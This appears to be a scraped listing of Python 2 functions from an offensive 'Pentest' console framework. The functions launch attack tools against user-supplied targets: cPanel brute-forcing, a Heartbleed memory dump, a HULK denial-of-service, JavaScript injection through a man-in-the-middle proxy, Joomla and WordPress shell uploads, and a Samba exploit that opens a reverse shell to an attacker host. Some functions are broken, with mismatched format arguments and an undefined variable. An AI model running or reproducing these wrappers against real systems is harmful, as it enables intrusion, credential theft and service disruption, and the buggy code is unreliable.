Esempio n. 1
0
def joomla_sql():
    while True:
        jo = raw_input("" + N + "Pentest>> (" + B + "modules/scanners)(" + R +
                       "scanner/joomla_sqli_scanners" + N + "): ")
        if jo == 'show options':
            help.option()
            joomla_sql()
        elif jo == 'back':
            core.menu.scan()
        elif jo == 'set target':
            q = raw_input("" + N + "Pentest>> (" + B + "modules/scanners)(" +
                          R + "scanner/joomla_sqli_scanners (set target)" + N +
                          "): ")
            print "list web => " + R + "", q
            m = raw_input("" + N + "Pentest>> (" + B + "modules/scanners)(" +
                          R + "scanner/joomla_sqli_scanners" + N + "): ")
            if m == "run":
                print "" + B + "[*] " + N + "Starting attacks..."
                os.system(
                    "cd modules;cd joomla_sqli_scanners;python joomsql.py %s" %
                    (q))
                print
                joomla_sql()
            else:
                joomla_sql()
        elif jo == 'clear':
            clean()
            joomla_sql()
        else:
            print "Wrong Command => ", jo
            print "" + N + "" + B + "[" + R + "!" + B + "] " + N + "Please enter 'show options'"
            joomla_sql()
        pass
Esempio n. 2
0
def cpanel():
    while True:
        vc = raw_input(""+N+"Pentest>> ("+B+"modules/exploits)("+R+"exploit/cpanel_bruteforce"+N+"): ")
        if vc == 'show options':
            help.option()
            cpanel()
        elif vc == "back":
            core.menu.exploits()
        elif vc == 'set target':
            usr = raw_input(""+N+"Pentest>> ("+B+"modules/exploits)("+R+"exploit/cpanel_bruteforce (set user)"+N+"): ")
            print "username = >"+R+"",usr
            port = raw_input(""+N+"Pentest>> ("+B+"modules/exploits)("+R+"exploit/cpanel_bruteforce (set lport)"+N+"): ")
            print "LPORT = > "+R+"",port
            pss = raw_input(""+N+"Pentest>> ("+B+"modules/exploits)("+R+"exploit/cpanel_bruteforce (set list)"+N+"): ")
            print "list =>"+R+"",pss
            pas = raw_input(""+N+"Pentest>> ("+B+"modules/exploits)("+R+"exploit/cpanel_bruteforce (set savePass)"+N+"): ")
            print "save on => "+R+"",pas
            god = raw_input(""+N+"Pentest>> ("+B+"modules/exploits)("+R+"exploit/cpanel_bruteforce"+N+"): ")
            if god == "run":
                print ""+B+"[*] "+N+"Starting attacks..."
                os.system("cd modules;cd cpanel;perl cpanel.pl %s %s %s %s %s" % (vc,usr,port,pss,pas))
                print ""+B+"[*]"+N+" Job finished!"
                print
                cpanel()
            elif god == 'back':
                core.menu.exploits()
        elif vc =='clear':
            clean()
            cpanel()
        else:
            print "Wrong Command => ", vc
            print ""+N+""+B+"["+R+"!"+B+"] "+N+"Please enter 'show options'"
            cpanel()
Esempio n. 3
0
def vb():
    while True:
        list = raw_input("" + N + "Pentest>> (" + B + "modules/post)(" + R +
                         "post/vbulletin" + N + "): ")
        if list == 'show options':
            help.option()
            vb()
        elif list == "back":
            core.menu.post()

        elif list == 'set target':
            go = raw_input("" + N + "Pentest>> (" + B + "modules/post)(" + R +
                           "post/vbulletin (vbulletin$)" + N + "): ")
            print "target =>" + R + "", go
            se = raw_input("" + N + "Pentest>> (" + B + "modules/post)(" + R +
                           "post/vbulletin (vbulletin$)" + N + "): ")
            if se == "run":
                os.system('python modules/vbulletin/vb.py %s' % (go))
                vb()
            elif se == 'back':
                core.menu.post()
        elif list == 'clear':
            clean()
            vb()
        else:
            print "Wrong Command => ", list
            print "" + N + "" + B + "[" + R + "!" + B + "] " + N + "Please enter 'show options'"
            vb()
Esempio n. 4
0
def res():
    while True:
        sha = raw_input(""+N+"Pentest>> ("+B+"modules/exploits)("+R+"exploi/restrict_anonymous"+N+"): ")
        if sha =='show options':
            help.option()
            res()
        elif sha =='back':
            core.menu.exploits()
        elif sha =='clear':
            clean()
            res()
        elif sha =='set target':
            u =raw_input(""+N+"Pentest>> ("+B+"modules/exploits)("+R+"exploi/restrict_anonymous ("+G+"User)"+N+"): ")
            p =raw_input(""+N+"Pentest>> ("+B+"modules/exploits)("+R+"exploi/restrict_anonymous ("+G+"Pass)"+N+"): ")
            target =raw_input(""+N+"Pentest>> ("+B+"modules/exploits)("+R+"exploi/restrict_anonymous ("+G+"Target)"+N+"): ")
            ra = raw_input(""+N+"Pentest>> ("+B+"modules/exploits)("+R+"exploi/enumeration"+N+"): ")
            if ra == 'run':
               os.system('perl modules/enum/enum4linux.pl -u %s -p %s -U %s ' % (u, p, target))
               res()
            else:
                res()
        else:
            print "Wrong Command => ", sha
            print ""+N+""+B+"["+R+"!"+B+"] "+N+"Please enter 'show options'"
            res()
Esempio n. 5
0
def ssl():
    while True:
        map =raw_input(""+N+"Pentest>> ("+B+"modules/exploits)("+R+"exploit/openssl_heartbleed"+N+"): ")
        if map == 'show options':
            help.option()
            ssl()
        elif map == 'back':
            core.menu.exploits()
        elif map =='set target':
             rhost =raw_input(""+N+"Pentest>> ("+B+"modules/exploits)("+R+"exploit/openssl_heartbleed "+G+"(set RHOST)"+N+"): ")
             print "RHOST =>",rhost
             rport =raw_input(""+N+"Pentest>> ("+B+"modules/exploits)("+R+"exploit/openssl_heartbleed "+G+"(set RPORT)"+N+"): ")
             print "RPORT =>",rport
             her =raw_input(""+N+"Pentest>> ("+B+"modules/exploits)("+R+"exploit/openssl_heartbleed "+N+"): ")
             if her =='run':
                os.system('msfconsole -q -x"use auxiliary/scanner/ssl/openssl_heartbleed; set RHOSTS %s ; set RPORT %s ; set action DUMP ; run "' % (rhost, rport))
                print
                ssl()
        elif map =='clear':
            clean()
            ssl()
        else:
            print "Wrong Command => ", map
            print ""+N+""+B+"["+R+"!"+B+"] "+N+"Please enter 'show options'"
            ssl()
Esempio n. 6
0
def dos():
    while True:
        dd = raw_input(""+N+"Pentest>> ("+B+"modules/exploits)("+R+"exploit/power_dos"+N+"): ")
        if dd == 'show options':
            help.option()
            dos()
        elif dd == "back":
            core.menu.exploits()
        elif dd == 'set target':
             target = raw_input(""+N+"Pentest>> ("+B+"modules/exploits)("+R+"exploit/power_dos (set target)"+N+"): ")
             print "target =>"+R+"",target
             run = raw_input(""+N+"Pentest>> ("+B+"modules/exploits)("+R+"exploit/power_dos"+N+"): ")
             if run == "run":
                 os.system("cd modules;cd hulk_attacks;python hulk.py %s" % (target))
                 print ""+B+"[*]"+N+" Job finished!"
                 print
                 dos()
             else:
                 dos()
        elif dd == 'clear':
            clean()
            dos()
        else:
            print "Wrong Command => ", dd
            print ""+N+""+B+"["+R+"!"+B+"] "+N+"Please enter 'show options'"
            dos()
Esempio n. 7
0
def html11():
    while True:
        inj = raw_input(""+N+"Pentest>> ("+B+"modules/exploits)("+R+"exploi/inject_html"+N+"): ")
        if inj =='show options':
            help.option()
            html11()
        elif inj =='back':
            core.menu.exploits()
        elif inj =='clear':
            clean()
            html11()
        elif inj =='set target':
            parse =raw_input(""+N+"Pentest>> ("+B+"modules/exploits)("+R+"exploi/inject_html ("+G+"target_parse)"+N+"): ")
            ips =raw_input(""+N+"Pentest>> ("+B+"modules/exploits)("+R+"exploi/inject_html ("+G+"target_ips)"+N+"): ")
            html =raw_input(""+N+"Pentest>> ("+B+"modules/exploits)("+R+"exploi/inject_html ("+G+"file_html)"+N+"): ")
            interface =raw_input(""+N+"Pentest>> ("+B+"modules/exploits)("+R+"exploi/inject_html ("+G+"up_interface)"+N+"): ")
            gateway =raw_input(""+N+"Pentest>> ("+B+"modules/exploits)("+R+"exploi/inject_html ("+G+"gateway)"+N+"): ")
            print "press run for Attacks"
            ra = raw_input(""+N+"Pentest>> ("+B+"modules/exploits)("+R+"exploi/inject_html"+N+"): ")
            if ra == 'run':
               os.system("xettercap %s %s --proxy-module=/opt/Pentest/modules/bettercap/lib/bettercap/proxy/http/modules/injecthtml.rb --js-file %s -I %s --gateway %s " % (parse, ips, html, interface, gateway))
               html11()
            else:
                html11()
        else:
            print "Wrong Command => ", inj
            print ""+N+""+B+"["+R+"!"+B+"] "+N+"Please enter 'show options'"
            html11()
Esempio n. 8
0
def nmap_vul():
    while True:
        map = raw_input("" + N + "Pentest>> (" + B + "modules/scanners)(" + R +
                        "scanner/nmap_scanner" + N + "): ")
        if map == 'show options':
            help.option()
            nmap_vul()
        elif map == 'back':
            core.menu.scan()
        elif map == 'set target':
            target = raw_input("" + N + "Pentest>> (" + B +
                               "modules/scanners)(" + R +
                               "scanner/nmap_scanner (set IP)" + N + "): ")
            print "Target => " + R + "", target
            ta = raw_input("Pentest>> (" + B + "modules/scanners)(" + R +
                           "scanner/nmap_scanner" + N + "): ")
            if ta == "run":
                os.system("nmap -sV --script vuln %s" % (target))
                nmap_vul()
            else:
                nmap_vul()
        elif map == 'clear':
            clean()
            nmap_vul()
        else:
            print "Wrong Command => ", map
            print "" + N + "" + B + "[" + R + "!" + B + "] " + N + "Please enter 'show options'"
            nmap_vul()
        pass
Esempio n. 9
0
def spaghetti():
    while True:
        map = raw_input("" + N + "Pentest>> (" + B + "modules/scanners)(" + R +
                        "scanner/spaghetti" + N + "): ")
        if map == 'show options':
            help.option()
            spaghetti()
        elif map == 'back':
            core.menu.scan()
        elif map == 'set target':
            target = raw_input("" + N + "Pentest>> (" + B +
                               "modules/scanners)(" + R +
                               "scanner/spaghetti (" + G + "set target)" + N +
                               "): ")
            print "Target => " + R + "", target
            ta = raw_input("Pentest>> (" + B + "modules/scanners)(" + R +
                           "scanner/spaghetti" + N + "): ")
            if ta == "run":
                os.system(
                    "python modules/spaghetti/spaghetti.py --url %s --scan [0-3] "
                    % (target))
                spaghetti()
            else:
                spaghetti()
        elif map == 'clear':
            clean()
            spaghetti()
        else:
            print "Wrong Command => ", map
            print "" + N + "" + B + "[" + R + "!" + B + "] " + N + "Please enter 'show options'"
            spaghetti()
        pass
Esempio n. 10
0
def jdown():
    while True:
        a = raw_input("" + N + "Pentest>> (" + B + "modules/scanners)(" + R +
                      "scanner/jdownloads_scanners" + N + "): ")
        if a == 'show options':
            help.option()
            jdown()
        elif a == 'back':
            core.menu.scan()
        elif a == 'set target':
            li = raw_input("" + N + "(list)> (" + B + "modules/scanners)(" +
                           R + "scanner/jdownloads_scanners (set target)" + N +
                           "): ")
            print "list => " + R + "", li
            ruu = raw_input("" + N + "Pentest>> (" + B + "modules/scanners)(" +
                            R + "scanner/jdownloads_scanners" + N + "): ")
            if ruu == "run":
                print "" + B + "[*]" + N + " Starting attacks..."
                os.system(
                    "cd modules;cd jdownloads_scanner;perl jdownloads_scanner.pl %s"
                    % (li))
                print "" + B + "[*]" + N + " Job finished!"
                print
                jdown()
            else:
                jdown()
        elif a == 'clear':
            clean()
            jdown()
        else:
            print "Wrong Command => ", a
            print "" + N + "" + B + "[" + R + "!" + B + "] " + N + "Please enter 'show options'"
            jdown()
        pass
Esempio n. 11
0
def smb():
    while True:
        map = raw_input("" + N + "Pentest>> (" + B + "modules/scanners)(" + R +
                        "scanner/smb_scanning" + N + "): ")
        if map == 'show options':
            help.option()
            smb()
        elif map == 'back':
            core.menu.scan()
        elif map == 'set target':
            target = raw_input("" + N + "Pentest>> (" + B +
                               "modules/scanners)(" + R +
                               "scanner/smb_scanning (" + G + "set target)" +
                               N + "): ")
            print "Target => " + R + "", target
            ta = raw_input("Pentest>> (" + B + "modules/scanners)(" + R +
                           "scanner/smb_scanning" + N + "): ")
            if ta == "run":
                os.system(
                    "nmap -v 445 --script=smb-check-vulns --script-args=unsafe=1 %s"
                    % (target))
                smb()
            else:
                smb()
        elif map == 'clear':
            clean()
            smb()
        else:
            print "Wrong Command => ", map
            print "" + N + "" + B + "[" + R + "!" + B + "] " + N + "Please enter 'show options'"
            smb()
        pass
Esempio n. 12
0
def scan_v2():
    while True:
        v2 = raw_input("" + N + "Pentest>> (" + B + "modules/scanners)(" + R +
                       "scanner/joomla_scanners_v.2" + N + "): ")
        if v2 == 'show options':
            help.option()
            scan_v2()
        elif v2 == 'back':
            core.menu.scan()
        elif v2 == 'set target':
            p = raw_input("" + N + "Pentest>> (" + B + "modules/scanners)(" +
                          R + "scanner/joomla_scanners_v.2 (set target)" + N +
                          "): ")
            print "target => " + R + "", p
            o = raw_input("" + N + "Pentest>> (" + B + "modules/scanners)(" +
                          R + "scanner/joomla_scanners_v.2" + N + "): ")
            if o == "run":
                os.system(
                    "cd modules;cd joomscan_v2;python joomlascan2.py %s" % (p))
                print "" + B + "[*]" + N + " Job finished!"
                print
                scan_v2()
            else:
                scan_v2()
        elif v2 == 'clear':
            clean()
            scan_v2()
        else:
            print "Wrong Command => ", v2
            print "" + N + "" + B + "[" + R + "!" + B + "] " + N + "Please enter 'show options'"
            scan_v2()
        pass
Esempio n. 13
0
def scan_v3():
    while True:
        se = raw_input("" + N + "Pentest>> (" + B + "modules/scanners)(" + R +
                       "joomla_scanners_v3" + N + "): ")
        if se == 'show options':
            help.option()
            scan_v3()
        elif se == 'back':
            core.menu.scan()
        elif se == 'set target':
            x = raw_input("" + N + "Pentest>> (" + B + "modules/scanners)(" +
                          R + "scanner/joomla_scanners_v3 (set target)" + N +
                          "): ")
            print "target => " + R + "", x
            i = raw_input("" + N + "Pentest>> (" + B + "modules/scanners)(" +
                          R + "joomla_scanners_v3" + N + "): ")
            if i == "run":
                time.sleep(2)
                print "" + B + "[*]" + N + " Starting attacks..."
                os.system(
                    "cd modules;cd joomscan_v3;python joomlascanner.py %s" %
                    (x))
                print "" + B + "[*]" + N + " Job finished!"
                print
                scan_v3()
            else:
                scan_v3()
        elif se == 'clear':
            clean()
            scan_v3()
        else:
            print "Wrong Command => ", se
            print "" + N + "" + B + "[" + R + "!" + B + "] " + N + "Please enter 'show options'"
            scan_v3()
        pass
Esempio n. 14
0
def joomscan():
    while True:
        jaa = raw_input("" + N + "Pentest>> (" + B + "modules/scanners)(" + R +
                        "scanner/jomscan_v4" + N + "): ")
        if jaa == 'show options':
            help.option()
            joomscan()
        elif jaa == 'back':
            core.menu.scan()
        elif jaa == 'set target':
            ops = raw_input("" + N + "Pentest>> (" + B + "modules/scanners)(" +
                            R + "scanner/jomscan_v4 (target)" + N + "): ")
            print "target => " + R + "", ops
            rup = raw_input("" + N + "(Pentest)> (" + B +
                            "modules/scanners)(" + R + "scanner/jomscan_v4" +
                            N + "): ")
            if rup == "run":
                print "" + B + "[*]" + N + " Starting Attacks..."
                os.system("cd modules;cd joomscan_v4;python scan.py %s" %
                          (ops))
                print "" + B + "[*]" + N + " Job finished!"
                print
                joomscan()
            else:
                joomscan()
        elif jaa == 'clear':
            clean()
            joomscan()
        else:
            print "Wrong Command => ", jaa
            print "" + N + "" + B + "[" + R + "!" + B + "] " + N + "Please enter 'show options'"
            joomscan()
        pass
Esempio n. 15
0
def jomfox():
    while True:
        jj = raw_input(""+N+"Pentest>> ("+B+"modules/exploits)("+R+"exploit/joomla_com_foxcontact"+N+"): ")
        if jj == 'show options':
            help.option()
            jomfox()
        elif jj == "back":
            core.menu.exploits()
        elif jj== 'set target':
             ts = raw_input(""+N+"Pentest>> ("+B+"modules/exploits)("+R+"exploit/joomla_com_foxcontact (set target)"+N+"): ")
             print "target => "+R+"",ts
             print ""+N+"=>"+N+" id?"+R+" example.com/index.php?option=com_foxcontact&view=foxcontact&Itemid="+G+"161 "+R+"<="
             cid = raw_input(""+N+"Pentest>> ("+B+"modules/exploits)("+R+"exploit/joomla_com_foxcontact (set CID)"+N+"): ")
             print "CID => "+R+"",cid
             kt = raw_input(""+N+"(Pentest)> ("+B+"modules/exploits)("+R+"exploit/joomla_com_foxcontact"+N+"): ")
             if kt == "run":
                 time.sleep(1)
                 print ""+B+"["+R+"*"+B+"]"+N+" Starting attacks..."
                 os.system("cd modules;cd com_foxcontact;python exploit.py --url %s --cid %s" % (ts,cid))
                 print ""+B+"[*]"+N+" Job finished!"
                 print
                 jomfox()
             else:
                 jomfox()
        elif jj =='clear':
            clean()
            jomfox()
        else:
            print "Wrong Command => ", jj
            print ""+N+""+B+"["+R+"!"+B+"] "+N+"Please enter 'show options'"
            jomfox()
Esempio n. 16
0
def ssl():
    while True:
        map = raw_input("" + N + "Pentest>> (" + B + "modules/scanners)(" + R +
                        "scanner/ssl_scanning" + N + "): ")
        if map == 'show options':
            help.option()
            ssl()
        elif map == 'back':
            core.menu.scan()
        elif map == 'set target':
            target = raw_input("" + N + "Pentest>> (" + B +
                               "modules/scanners)(" + R +
                               "scanner/ssl_scanning (" + G + "set target)" +
                               N + "): ")
            print "Target => " + R + "", target
            ta = raw_input("Pentest>> (" + B + "modules/scanners)(" + R +
                           "scanner/ssl_scanning" + N + "): ")
            if ta == "run":
                os.system("python modules/a2sv/a2sv.py -t %s" % (target))
                ssl()
            else:
                ssl()
        elif map == 'clear':
            clean()
            ssl()
        else:
            print "Wrong Command => ", map
            print "" + N + "" + B + "[" + R + "!" + B + "] " + N + "Please enter 'show options'"
            ssl()
        pass
Esempio n. 17
0
def jmauto():
    while True:
        jm = raw_input(""+N+"Pentest>> ("+B+"modules/exploits)("+R+"exploit/jm_auto_change_pswd"+N+"): ")
        if jm == 'show options':
            help.option()
            jmauto()
        elif jm == "back":
            core.menu.exploits()
        elif jm == 'set target':
             er = raw_input(""+N+"Pentest>> ("+B+"modules/exploits)("+R+"exploit/jm_auto_change_pswd (set target)"+N+"): ")
             print "target =>"+R+"",er
             pa = raw_input(""+N+"Pentest>> ("+B+"modules/exploits)("+R+"exploit/jm_auto_change_pswd (set newpass)"+N+"): ")
             print "new pass => "+R+"",pa
             y = raw_input(""+N+"Pentest>> ("+B+"modules/exploits)("+R+"exploit/jm_auto_change_pswd"+N+"): ")
             time.sleep(2)
             if y == "run":
                 print ""+B+"[*] "+N+"Starting attacks..."
                 os.system("cd modules;cd autoriset_joomla0day;perl joomlariset.pl %s %s" % (er,pa))
                 print ""+B+"[*]"+N+" Job finished!"
                 print
                 jmauto()
             else:
                 jmauto()
        elif jm == 'clear':
            clean()
            jmauto()
        else:
            print "Wrong Command => ", jm
            print ""+N+""+B+"["+R+"!"+B+"] "+N+"Please enter 'show options'"
            jmauto()
Esempio n. 18
0
def java():
    while True:
        jav = raw_input(""+N+"Pentest>> ("+B+"modules/exploits)("+R+"exploit/inject_javascript"+N+"): ")
        if jav == 'show options':
            help.option()
            java()
        elif jav == "back":
            core.menu.exploits()
        elif jav == 'set target':
             parse = raw_input(""+N+"Pentest>> ("+B+"modules/exploits)("+R+"exploit/inject_javascript (set parse)"+N+"): ")
             ips = raw_input(""+N+"Pentest>> ("+B+"modules/exploits)("+R+"exploit/inject_javascript (set ips)"+N+"): ")
             js_file = raw_input(""+N+"Pentest>> ("+B+"modules/exploits)("+R+"exploit/inject_javascript (set js_file)"+N+"): ")
             up_interface = raw_input(""+N+"Pentest>> ("+B+"modules/exploits)("+R+"exploit/inject_javascript (set up_interface)"+N+"): ")
             gateway = raw_input(""+N+"Pentest>> ("+B+"modules/exploits)("+R+"exploit/inject_javascript (set gateway)"+N+"): ")
             ja = raw_input(""+N+"Pentest>> ("+B+"modules/exploits)("+R+"exploit/inject_javascript"+N+"): ")
             if ja =="run":
                os.system("xettercap %s --proxy-module=injectjs --js-file %s -I %s --gateway %s" % (parse, ips, js_file, up_interface, gateway))
                java()
             elif ja =="back":
                  core.menu.exploits()
        elif jav == 'clear':
            clean()
            java()
        else:
            print "Wrong Command => ", jav
            print ""+N+""+B+"["+R+"!"+B+"] "+N+"Please enter 'show options'"
            java()
Esempio n. 19
0
def dns_b():
    while True:
        dn = raw_input(""+N+"Pentest>> ("+B+"modules/exploits)("+R+"exploit/dns_bruteforce"+N+"): ")
        if dn == 'show options':
            help.option()
            dns_b()
        elif dn == 'back':
            core.menu.exploits()
        elif dn == 'set target':
            port = raw_input(""+N+"Pentest>> ("+B+"modules/exploits)("+R+"exploi/dns_bruteforce (set port)"+N+"): ")
            target = raw_input(""+N+"Pentest>> ("+B+"modules/exploits)("+R+"exploi/dns_bruteforce (set target)"+N+"): ")
            print "port target => ", target, port
            rr = raw_input(""+N+"Pentest>> ("+B+"modules/exploits)("+R+"exploi/dns_bruteforce"+N+"): ")
            if rr == 'run':
              os.system("nmap -p %s --script dns-brute.nse %s " % (port, target))
              dns_b()
            else:
                dns_b()
        elif dn == 'clear':
            clean()
            dns_b()
        else:
            print "Wrong Command => ", dn
            print ""+N+""+B+"["+R+"!"+B+"] "+N+"Please enter 'show options'"
            dns_b()
Esempio n. 20
0
def joomla():
    while True:
        jom = raw_input(""+N+"Pentest>> ("+B+"modules/exploits)("+R+"exploit/joomla_com_hdflayer"+N+"): ")
        if jom == 'show options':
            help.option()
            joomla()
        elif jom == "back":
            core.menu.exploits()
        elif jom == 'set target':
              t = raw_input(""+N+"Pentest>> ("+B+"modules/exploits)("+R+"exploi/joomla_com_hdflayer (set target)"+N+"): ")
              print "target => "+R+"",t
              f = raw_input(""+N+"Pentest>> ("+B+"modules/exploits)("+R+"exploi/joomla_com_hdflayer (set shellock)"+N+"): ")
              print "target => "+R+"",f
              r = raw_input(""+N+"(Pentest)> ("+B+"modules/exploits)("+R+"exploit/joomla_com_hdflayer"+N+"): ")
              if r == "run":
                  print ""+B+"[*] "+N+"Starting attacks..."
                  os.system("cd modules;cd exploit_joomla;python exploitjoomla.py -t %s -f %s" % (t,f))
                  print ""+B+"[*]"+N+" Job finished!"
                  print
                  joomla()
              elif r == 'back':
                   core.menu.exploits()
        elif jom == 'clear':
            clean()
            joomla()
        else:
            print "Wrong Command => ", jom
            print ""+N+""+B+"["+R+"!"+B+"] "+N+"Please enter 'show options'"
            joomla()
Esempio n. 21
0
def shake():
    while True:
        sha = raw_input(""+N+"Pentest>> ("+B+"modules/exploits)("+R+"exploi/shakescreen "+N+"): ")
        if sha =='show options':
            help.option()
            shake()
        elif sha =='back':
            core.menu.exploits()
        elif sha =='clear':
            clean()
            shake()
        elif sha =='set target':
            parse =raw_input(""+N+"Pentest>> ("+B+"modules/exploits)("+R+"exploi/shakescreen ("+G+"target_parse)"+N+"): ")
            ips =raw_input(""+N+"Pentest>> ("+B+"modules/exploits)("+R+"exploi/shakescreen ("+G+"target_ips)"+N+"): ")
            interface =raw_input(""+N+"Pentest>> ("+B+"modules/exploits)("+R+"exploi/shakescreen ("+G+"up_interface)"+N+"): ")
            gateway =raw_input(""+N+"Pentest>> ("+B+"modules/exploits)("+R+"exploi/shakescreen ("+G+"gateway)"+N+"): ")
            print "press run for Attacks"
            ra = raw_input(""+N+"Pentest>> ("+B+"modules/exploits)("+R+"exploi/shakescreen"+N+"): ")
            if ra == 'run':
               os.system("xettercap %s %s --proxy-module=injectjs --js-file '/opt/Pentest/modules/bettercap/modules/js/shakescreen.js' -I %s --gateway %s " % (parse, ips, interface, gateway))
               shake()
            else:
                shake()
        else:
            print "Wrong Command => ", sha
            print ""+N+""+B+"["+R+"!"+B+"] "+N+"Please enter 'show options'"
            shake()
Esempio n. 22
0
def shell():
    while True:
        sel = raw_input(""+N+"Pentest>> ("+B+"modules/exploits)("+R+"exploit/wp_symposium_shell_upload"+N+"): ")
        if sel == 'show options':
            help.option()
            shell()
        elif sel == "back":
            core.menu.exploits()
        elif sel == 'set target':
             vc = raw_input(""+N+"Pentest>> ("+B+"modules/exploits)("+R+"exploit/wp_symposium_shell_upload (set target)"+N+"): ")
             print "target => "+R+"",vc
             fl = raw_input(""+N+"Pentest>> ("+B+"modules/exploits)("+R+"exploi/wp_symposium_shell_upload (set shellock)"+N+"): ")
             print "shell location = > "+R+"",fl
             ru = raw_input(""+N+"Pentest>> ("+B+"modules/exploits)("+R+"exploi/wp_symposium_shell_upload"+N+"): ")
             if ru == "run":
                 print ""+B+"[*] "+N+"Starting attacks..."
                 os.system("cd modules;cd prestashop;python wp-symposium.py -t %s -f %s" % (vc,fl))
                 print ""+B+"[*]"+N+" Job finished!"
                 print
                 core.menu.exploits()
             elif ru == 'back':
                 core.menu.exploits()
        elif sel =='clear':
            clean()
            shell()
        else:
            print "Wrong Command => ", sel
            print ""+N+""+B+"["+R+"!"+B+"] "+N+"Please enter 'show options'"
            shell()
Esempio n. 23
0
def vb():
   while True:
       list = raw_input(""+N+"Pentest>> ("+B+"modules/exploits)("+R+"exploit/vbulletin"+N+"): ")
       if list == 'show options':
           help.option()
           vb()
       elif list == "back":
            core.menu.exploits()

       elif list == 'set target':
            vv = raw_input(""+N+"Pentest>> ("+B+"modules/exploits)("+R+"exploit/vbulletin (vBulletin$)"+N+"): ")
            print'Target =>', vv
            go = raw_input(""+N+"Pentest>> ("+B+"modules/exploits)("+R+"exploit/vbulletin "+N+"): ")
            if go == "run":
                os.system("python modules/vbulletin/vb.py %s" % (vv))
                vb()
            elif go =='back':
                 core.menu.exploits()
       elif list == 'clear':
            clean()
            vb()
       else:
           print "Wrong Command => ", list
           print ""+N+""+B+"["+R+"!"+B+"] "+N+"Please enter 'show options'"
           vb()
Esempio n. 24
0
def jomday():
    while True:
        day = raw_input(""+N+"Pentest>> ("+B+"modules/exploits)("+R+"exploit/joomla0day_com_myngallery"+N+"): ")
        if day == 'show options':
            help.option()
            jomday()
        elif day == "back":
            core.menu.exploits()
        elif day == 'set target':
             ft = raw_input(""+N+"Pentest>> ("+B+"modules/exploits)("+R+"exploi/joomla0day_com_myngallery (set target)"+N+"): ")
             print "target =>"+R+"",ft
             gr = raw_input(""+N+"(Pentest)> ("+B+"modules/exploits)("+R+"exploi/joomla0day_com_myngallery"+N+"): ")
             if gr == "run":
                 time.sleep(1)
                 print ""+B+"[*] "+N+"Starting attacks..."
                 os.system("cd modules;cd jom0;perl 0day.pl %s" % (ft))
                 print ""+B+"[*]"+N+" Job finished!"
                 print
                 jomday()
             elif gr == 'back':
                 core.menu.exploits()
        elif day == 'clear':
            clean()
            jomday()
        else:
            print "Wrong Command => ", day
            print ""+N+""+B+"["+R+"!"+B+"] "+N+"Please enter 'show options'"
            jomday()
Esempio n. 25
0
def smb():
    while True:
        map =raw_input(""+N+"Pentest>> ("+B+"modules/exploits)("+R+"exploit/samba"+N+"): ")
        if map == 'show options':
            help.option()
            smb()
        elif map == 'back':
            core.menu.exploits()
        elif map =='set target':
             rhost =raw_input(""+N+"Pentest>> ("+B+"modules/exploits)("+R+"exploit/samba "+G+"(set RHOST)"+N+"): ")
             print "RHOST =>",rhost
             rport =raw_input(""+N+"Pentest>> ("+B+"modules/exploits)("+R+"exploit/samba "+G+"(set RPORT)"+N+"): ")
             print "RPORT =>",rport
             lhost =raw_input(""+N+"Pentest>> ("+B+"modules/exploits)("+R+"exploit/samba "+G+"(set LHOST)"+N+"): ")
             print 'LHOST =>',lhost
             lport =raw_input(""+N+"Pentest>> ("+B+"modules/exploits)("+R+"exploit/samba "+G+"(set LPORT)"+N+"): ")
             print 'LPORT =>',lport
             her =raw_input(""+N+"Pentest>> ("+B+"modules/exploits)("+R+"exploit/samba "+N+"): ")
             if her =='run':
                os.system('msfconsole -q -x "use exploit/multi/samba/usermap_script; set RHOST %s ; set RPORT %s ; set payload cmd/unix/reverse ; set LHOST %s ; set LPORT %s ; run "' % (rhost, rport, lhost, lport))
                print
                smb()
        elif map =='clear':
            clean()
            smb()
        else:
            print "Wrong Command => ", map
            print ""+N+""+B+"["+R+"!"+B+"] "+N+"Please enter 'show options'"
            smb()
Esempio n. 26
0
def jomsi():
    while True:
        si = raw_input(""+N+"Pentest>> ("+B+"modules/exploits)("+R+"exploit/joomla_simple_shell"+N+"): ")
        if si == 'show options':
            help.option()
            jomsi()
        elif si == "back":
            core.menu.exploits()
        elif si== 'set target':
             ru = raw_input(""+N+"Pentest>> ("+B+"modules/exploits)("+R+"exploit/joomla_simple_shell (set target)"+N+"): ")
             print "target =>", ru
             star = raw_input(""+N+"Pentest>> ("+B+"modules/exploits)("+R+"exploit/joomla_simple_shell"+N+"): ")
             if star == 'run':
                 os.system("cd modules;cd joomla_ex;python joomla.py")
                 print ""+B+"[*]"+N+" Job finished!"
                 print
                 jomsi()
             elif star == 'back':
                 core.menu.exploits()
        elif si =='clear':
            clean()
            jomsi()
        else:
            print "Wrong Command => ", si
            print ""+N+""+B+"["+R+"!"+B+"] "+N+"Please enter 'show options'"
            jomsi()
Esempio n. 27
0
def xss():
    while True:
        cs = raw_input("" + N + "Pentest>> (" + B + "modules/post)(" + R +
                       "post/cms_war " + N + "): ")
        if cs == 'show options':
            help.option()
            xss()
        elif cs == 'set target':
            tops = raw_input("" + N + "Pentest>> (" + B + "modules/post)(" +
                             R + "post/cms_war " + G + "(set target)" + N +
                             "): ")
            print "target =>" + R + "", tops
            gay = raw_input("" + N + "Pentest>> (" + B + "modules/post)(" + R +
                            "post/cms_war" + N + "): ")
            if gay == "run":
                print "" + B + "[*]" + N + " Starting attacks Scanning..."
                os.system("cd modules;cd xsspy;python XssPy.py -u %s -v" %
                          (tops))
                print "" + B + "[*]" + N + " Job finished!"
                print
                xss()
            else:
                xss()
        elif cs == 'back':
            core.menu.post()
        elif cs == 'clear':
            clean()
            xss()
        else:
            print "Wrong Command => ", cs
            print "" + N + "" + B + "[" + R + "!" + B + "] " + N + "Please enter 'show options'"
            xss()
        pass
Esempio n. 28
0
def php():
   while True:
       list = raw_input(""+N+"Pentest>> ("+B+"modules/exploits)("+R+"exploit/php_thumb_shell_upload"+N+"): ")
       if list == 'show options':
           help.option()
           php()
       elif list == "back":
            core.menu.exploits()

       elif list == 'set target':
            tar = raw_input(""+N+"Pentest>> ("+B+"modules/exploits)("+R+"exploit/php_thumb_shell_upload (set target)"+N+"): ")
            print "target =>"+R+"",go
            go = raw_input(""+N+"Pentest>> ("+B+"modules/exploits)("+R+"exploit/php_thumb_shell_upload "+N+"): ")
            if go == "run":
                time.sleep(2)
                print ""+B+"[*] "+N+"Starting attacks..."
                os.system("cd modules;cd exploit_phpthumb;perl rcexploit.pl %s" % (tar))
                print ""+B+"[*]"+N+" Job finished!"
                php()
            elif go =='back':
                 core.menu.exploits()
       elif list == 'clear':
            clean()
            php()
       else:
           print "Wrong Command => ", list
           print ""+N+""+B+"["+R+"!"+B+"] "+N+"Please enter 'show options'"
           php()
